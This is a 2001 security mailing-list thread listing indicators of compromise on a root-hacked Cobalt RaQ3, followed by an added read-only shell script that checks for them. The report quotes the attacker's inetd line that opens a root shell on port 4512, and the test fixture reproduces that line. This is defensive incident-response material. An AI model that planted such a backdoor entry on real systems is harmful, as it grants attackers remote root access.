
Re: [cobalt-security] February Hack update



Hi,

Do you still have a copy of erkms.tgz?  I'd be interested in a copy if you
do (research - not seen that file on rooted boxes before).  Thanks.

Gossi.



On Sun, 4 Mar 2001 Stoopidcoopid@xxxxxxxxx wrote:

>
> We have finished checking our RAQ3 following a serious root hack in February
> using the Bind exploit. This is what we have found so far by comparing the
> hacked machine with a good machine:
>
> 1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in "/tmp"
> directory. The file had not been executed. A directory called "erkms" was
> also created although it was empty.
>
> Advice: run a check for the "erkms.tgz" file and directories.
> Also check for
>   /dev/hdcc
>   /dev/hdbb
>   /dev/ptyq
> as the presence of these may indicate that the script was at least partly
> executed.
>
>
> 2) A file called "init" was put into the "/usr/sbin" directory and a process
> called "init" was activated every 5 minutes by executing the file from
> crontab. Two "init" processes were therefore running at the same time; the
> purpose of the new process is unknown.
>
> Advice: Check for the "init" file, check your crontab entries and check what
> processes are running. Look for an "init" process other than that found at
> PID1 using "ps -ax".
>
>
> 3) Changes were made to "/etc/rc.d/rc.sysinit" to add the text
> "/usr/sbin/cronlogd" at the end which launches a process
> called "cronlogd", purpose unknown.
>
> Advice: Check the "/etc/rc.d/rc.sysinit" file has not been tampered with and
> what processes are running using "ps -ax".
>
>
> 4) Changes were made to the file "inetd.conf" and also to the file
> "inetd.conf.noqpopper", both found in the "/etc" directory. A new line
> reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files
> which opens port 4512.
>
> Advice: check what ports you have open using
>
> netstat -ap | grep "*:*"
>
> Check both of the above files have not been tampered with.
>
>
> 5) We have a suspect small text file called "la.pid" in both "root" dir and
> "/usr/sbin" dir. Web security pages suggest this could be an indicator of
> whether malicious code has been properly installed or not. It is not found
> on a good machine.
>
> Advice: Try a "locate la.pid" from the command line. Any advice or updates
> on this file or the other malicious files or processes is welcome.
>
> SC
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>
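The checks SC lists (files, device nodes, the rc.sysinit launcher, the inetd service on 4512, cron entries and the extra "init" process) gathered into one read-only script, as an added example that is not part of either message in the thread. The indicator paths are exactly the ones named in the report; the function names, the optional root prefix (so the same checks can run against a mounted image) and the constructed sample tree are my own and not from any tool the thread mentions.

```shell
#!/bin/sh
# Added example (not from the original thread): read-only host check for the
# indicators SC reported. ROOT is an optional prefix so the same checks can be
# run against a mounted disk image or, as below, a constructed sample tree.

# Print one "INDICATOR:" line per finding under the tree rooted at $1.
scan_indicators() {
    root="${1:-}"
    # Files and device nodes named in the report: rootkit archive and its
    # directory, fake devices, rogue init/cronlogd binaries, la.pid markers.
    for p in /tmp/erkms.tgz /tmp/erkms /dev/hdcc /dev/hdbb /dev/ptyq \
             /usr/sbin/init /usr/sbin/cronlogd /root/la.pid /usr/sbin/la.pid
    do
        if [ -e "$root$p" ]; then echo "INDICATOR: $root$p exists"; fi
    done
    # rc.sysinit with the cronlogd launcher appended.
    f="$root/etc/rc.d/rc.sysinit"
    if [ -f "$f" ] && grep -q 'cronlogd' "$f"; then
        echo "INDICATOR: cronlogd launcher in $f"
    fi
    # inetd entry opening port 4512 (the report's "4512 stream tcp ..." line).
    for f in "$root/etc/inetd.conf" "$root/etc/inetd.conf.noqpopper"; do
        if [ -f "$f" ] && grep -Eq '^4512[[:space:]]+stream[[:space:]]+tcp' "$f"; then
            echo "INDICATOR: port 4512 service in $f"
        fi
    done
    # cron entries that keep re-launching the rogue /usr/sbin/init.
    for f in "$root/etc/crontab" "$root"/var/spool/cron/* "$root"/etc/cron.d/*; do
        if [ -f "$f" ] && grep -q '/usr/sbin/init' "$f"; then
            echo "INDICATOR: cron entry runs /usr/sbin/init in $f"
        fi
    done
    return 0
}

# Number of findings under $1, for scripting and assertions.
count_indicators() {
    scan_indicators "$1" | grep -c '^INDICATOR:' || true
}

# Live-only check from item 2: any "init" process that is not PID 1.
rogue_init_processes() {
    ps -eo pid=,comm= | awk '$2 == "init" && $1 != 1'
}

# Constructed sample tree (not a real compromised host) reproducing some of
# the reported artifacts so the checks can be exercised safely. Prints its path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/tmp" "$d/etc/rc.d" "$d/usr/sbin" "$d/root"
    : > "$d/tmp/erkms.tgz"
    : > "$d/usr/sbin/la.pid"
    printf 'ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n' > "$d/etc/inetd.conf"
    printf '4512 stream tcp nowait root /bin/sh sh -i\n' >> "$d/etc/inetd.conf"
    printf '#!/bin/sh\n# original boot script ...\n/usr/sbin/cronlogd\n' > "$d/etc/rc.d/rc.sysinit"
    printf '*/5 * * * * root /usr/sbin/init\n' > "$d/etc/crontab"
    echo "$d"
}

# Demo against the constructed tree; on a live host run: scan_indicators ""
sample=$(make_sample_tree)
scan_indicators "$sample"
echo "findings: $(count_indicators "$sample")"
rm -rf "$sample"
```

Run it with an empty prefix on the host itself, or point the prefix at a mounted copy of the suspect disk so nothing on the compromised system (including a possibly replaced `ps` or `grep`) is trusted; `rogue_init_processes` is the only check that has to run live.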